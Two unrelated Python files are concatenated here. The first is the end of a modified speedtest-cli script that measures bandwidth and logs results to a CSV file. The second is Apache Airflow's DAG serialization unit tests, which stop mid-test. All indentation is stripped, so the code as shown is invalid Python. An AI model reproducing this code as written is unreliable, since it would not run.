name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
#Add server details to output
output += ", %s, %s, %.2f, %s" % (best["sponsor"], best["name"], best["d"], best["latency"])
#print output
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
# ADD DOWNLOAD SPEED TO OUTPUT
output += ", %0.2f" % ((dlspeed / 1000 / 1000) * 8)
#print output
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
# ADD UPLOAD SPEED TO OUTPUT
output += ", %0.2f" % ((ulspeed / 1000 / 1000) * 8)
#print output
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
# Append new line to output
output += "\n"
# Append results to results.csv
with open("results.csv", "a") as outputfile:
outputfile.write(output)
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.param import Param, ParamsDict
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_ext": ['.sh', '.bash'],
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_ext": [],
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"schedule_interval": {"__type": "timedelta", "__var": 86400.0},
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
"params": {},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
CUSTOM_TIMETABLE_SERIALIZED = {
"__type": "tests.test_utils.timetables.CustomSerializationTimetable",
"__var": {"value": "foo"},
}
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def get_timetable_based_simple_dag(timetable):
"""Create a simple_dag variant that uses timetable instead of schedule_interval."""
dag = collect_dags(["airflow/example_dags"])["simple_dag"]
dag.timetable = timetable
dag.schedule_interval = timetable.summary
return dag
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
"""Patch plugins manager to always and only return our custom timetable."""
from airflow import plugins_manager
monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
monkeypatch.setattr(
plugins_manager,
"timetable_classes",
{"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
)
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
self.backup_base_hook_get_connection = BaseHook.get_connection
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def teardown_method(self):
BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
"timetable, serialized_timetable",
[
(
cron_timetable("0 0 * * *"),
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "0 0 * * *", "timezone": "UTC"},
},
),
(
CustomSerializationTimetable("foo"),
CUSTOM_TIMETABLE_SERIALIZED,
),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
"""Verify a timetable-backed schedule_interval is excluded in serialization."""
dag = get_timetable_based_simple_dag(timetable)
serialized_dag = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(serialized_dag)
expected = copy.deepcopy(serialized_simple_dag_ground_truth)
del expected["dag"]["schedule_interval"]
expected["dag"]["timetable"] = serialized_timetable
self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
"""Verify serialization fails without timetable registration."""
dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
with pytest.raises(SerializationError) as ctx:
SerializedDAG.to_dict(dag)
message = (
"Failed to serialize DAG 'simple_dag': Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
"timetable",
[cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
"""Verify a timetable-backed serialization can be deserialized."""
dag = get_timetable_based_simple_dag(timetable)
roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually.
'timetable',
'timezone',
# Need to check fields in it, to exclude functions.
'default_args',
"_task_group",
'params',
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timetable.summary == dag.timetable.summary
assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_ext',
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
'params',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_ext) == set(task.template_ext)
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Ugly hack as some operators override params var in their init
if isinstance(task.params, ParamsDict):
assert serialized_task.params.dump() == task.params.dump()
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@pytest.mark.parametrize(
"dag_start_date, task_start_date, expected_task_start_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"dag_end_date, task_end_date, expected_task_end_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
"serialized_timetable, expected_timetable",
[
({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
(
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "@weekly", "timezone": "UTC"},
},
cron_timetable("0 0 * * 0"),
),
({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
(
{
"__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
"__var": {"delta": 86400.0},
},
delta_timetable(timedelta(days=1)),
),
(CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
self,
serialized_timetable,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": serialized_timetable,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": CUSTOM_TIMETABLE_SERIALIZED,
},
}
SerializedDAG.validate_schema(serialized)
with pytest.raises(ValueError) as ctx:
SerializedDAG.from_dict(serialized)
message = (
"Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
@pytest.mark.parametrize(
"serialized_schedule_interval, expected_timetable",
[
(None, NullTimetable()),
("@weekly", cron_timetable("0 0 * * 0")),
("@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
delta_timetable(timedelta(days=1)),
),
],
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_timetable,
):
"""Test DAGs serialized before 2.2 can be correctly deserialized."""
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
"val, expected",
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
],
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
assert "params" in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params.dump()
assert expected_val == deserialized_simple_task.params.dump()
def test_invalid_params(self):
"""
Test to make sure that only native Param objects are being passed as dag or task params
"""
class S3Param(Param):
def __init__(self, path: str):
schema = {"type": "string", "pattern": r"s3:\/\/(.+?)\/(.+)"}
super().__init__(default=path, schema=schema)
dag = DAG(dag_id='simple_dag', params={'path': S3Param('s3://my_bucket/my_path')})
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
dag = DAG(dag_id='simple_dag')
BaseOperator(
task_id='simple_task',
dag=dag,
start_date=datetime(2019, 8, 1),
params={'path': S3Param('s3://my_bucket/my_path')},
)
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params.dump()
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
XCom.set(
key='search_query',
value="dummy_value_1",
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
SerializedDAG.from_dict(serialized_dag)
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
)
assert expected_err_msg in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
XCom.set(
key='search_query',
value=["dummy_value_1", "dummy_value_2"],
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
